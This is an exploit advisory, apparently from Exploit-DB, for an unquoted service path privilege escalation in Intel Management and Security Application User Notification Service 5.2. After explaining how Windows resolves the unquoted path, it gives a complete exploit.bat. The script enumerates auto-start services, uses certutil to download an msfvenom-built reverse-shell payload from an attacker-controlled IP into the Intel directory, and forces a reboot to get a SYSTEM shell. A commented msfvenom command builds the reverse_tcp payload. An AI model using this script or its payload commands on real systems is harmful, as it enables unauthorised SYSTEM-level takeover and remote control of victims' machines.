Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path

Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path Privilege Escalation

Intel(r) Management and Security Application User Notification Service (v5.2) path contains spaces and is not surrounded by quotation marks and Windows has to guess where to find the UNS executable that starts automatically. Windows will first consider the space at the end of the filename and interpret everything that follows are arguments passed to that executable.

Exploit URL: https://www.exploit-db.com/exploits/49144

# User Notification Service path:
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
0x01 Option:
File Path: C:\Program
Arguments: Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe

If there is not Program.exe under "C:\" directory, Windows will attempt second option.

0x02 Option:
File Path: C:\Program Files
Arguments: (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe

If there is not Program Files.exe under "C:\" directory , Windows will attempt third option.

0x03 Option:
File Path: C:\Program Files (x86)\Common
Arguments: Files\Intel\Privacy Icon\UNS\UNS.exe

If there is not Common.exe under "C:\Program Files(x86)\" directory , Windows will attempt fourth option.

0x04 Option:
File Path: C:\Program Files (x86)\Common Files\Intel\Privacy
Arguments: Icon\UNS\UNS.exe

If there is not Privacy.exe under "C:\Program Files (x86)\Common Files\Intel\" directory , Windows will attempt fifth option.

0x05 Option:
File Path:
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
Arguments: <blank>

If an user has permission to write one of these directories, mandatory level of user will be elevated as SYSTEM during reboot Windows 7 / 8 machine.

I have discovered this vulnerability on Intel User Notification Service 5.2 , maybe other versions are lower than 5.2 that are affected as well. Privacy.exe was created with mfsvenom and served on port 80. Also, port 443 was used for reverse shell so if there is a firewall in front of target machine, outbound firewall rules allow 80, 443, 53 ports usually.

Using following commands, I elevated mandatory level from high to SYSTEM without special misconfiguration on directory.

exploit.bat:

@ECHO OFF
ECHO =======================================================================================================================
ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
ECHO =======================================================================================================================
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc UNS
ECHO [+] Your mandoroty level is:
whoami /groups | findstr /B /C:"Mandatory Label"
::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
ECHO [?]
ECHO [+] Enumeration was completed successfully.
ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
PAUSE
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will reboot.
PAUSE
shutdown /r /t 0
::code end